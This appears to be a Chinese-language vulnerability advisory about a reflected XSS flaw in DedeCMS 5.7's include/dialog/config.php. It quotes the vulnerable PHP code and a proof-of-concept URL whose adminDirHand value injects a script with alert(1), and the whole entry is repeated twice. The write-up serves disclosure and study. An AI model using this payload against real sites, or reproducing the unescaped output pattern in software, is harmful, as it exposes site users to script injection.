VULHUB ™

dedecms 5.7 config.php 跨站脚本漏洞 \include\dialog\config.php ``` $cuserLogin = new userLogin(); if($cuserLogin->getUserID() <=0 ) { if(empty($adminDirHand)) { ShowMsg("<b>提示：需输入后台管理目录才能登录</b><br /><form>请输入后台管理目录名：<input type='hidden' name='gotopage' value='".urlencode($dedeNowurl)."' /><input type='text' name='adminDirHand' value='dede' style='width:120px;' /><input style='width:80px;' type='submit' name='sbt' value='转入登录' /></form>", "javascript:;"); exit(); } $gurl = "../../{$adminDirHand}/login.php?gotopage=".urlencode($dedeNowurl); echo "<script language='javascript'>location='$gurl';</script>"; exit(); } ``` 对用户提交的$adminDirHand 没有进行过滤，导致用户可以通过提交： ``` http://127.0.0.1/dedecms/include/dialog/config.php?adminDirHand="/></script><script>alert(1);</script> ``` 进行XSS攻击。

dedecms 5.7 config.php 跨站脚本漏洞 \include\dialog\config.php ``` $cuserLogin = new userLogin(); if($cuserLogin->getUserID() <=0 ) { if(empty($adminDirHand)) { ShowMsg("<b>提示：需输入后台管理目录才能登录</b><br /><form>请输入后台管理目录名：<input type='hidden' name='gotopage' value='".urlencode($dedeNowurl)."' /><input type='text' name='adminDirHand' value='dede' style='width:120px;' /><input style='width:80px;' type='submit' name='sbt' value='转入登录' /></form>", "javascript:;"); exit(); } $gurl = "../../{$adminDirHand}/login.php?gotopage=".urlencode($dedeNowurl); echo "<script language='javascript'>location='$gurl';</script>"; exit(); } ``` 对用户提交的$adminDirHand 没有进行过滤，导致用户可以通过提交： ``` http://127.0.0.1/dedecms/include/dialog/config.php?adminDirHand="/></script><script>alert(1);</script> ``` 进行XSS攻击。